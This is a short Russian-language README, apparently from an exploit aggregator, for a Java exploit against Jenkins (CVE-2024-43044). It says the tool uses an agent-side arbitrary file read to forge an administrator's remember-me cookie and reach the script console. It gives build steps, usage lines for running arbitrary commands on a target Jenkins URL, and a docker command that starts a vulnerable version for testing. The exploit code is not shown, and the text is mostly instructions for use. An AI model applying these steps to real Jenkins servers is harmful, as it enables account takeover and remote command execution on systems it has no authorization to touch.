## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CONVISOLABS-CVE-2024-43044-JENKINS
## Введение
Это эксплойт для CVE-2024-43044 — произвольное чтение файлов, которое позволяет агенту получать файлы с контроллера.
Эксплойт использует уязвимость для чтения файлов с целью подделки remember-me cookie для учётной записи администратора и получения доступа к скриптовому движку Jenkins.
Полный разбор доступен по ссылке https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
## Сборка эксплойта
root@kitploit:~
mvn package
## Запуск эксплойта
root@kitploit:~
Использование эксплойта:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
## Тестирование
Вы можете протестировать его на уязвимой версии с помощью docker:
root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17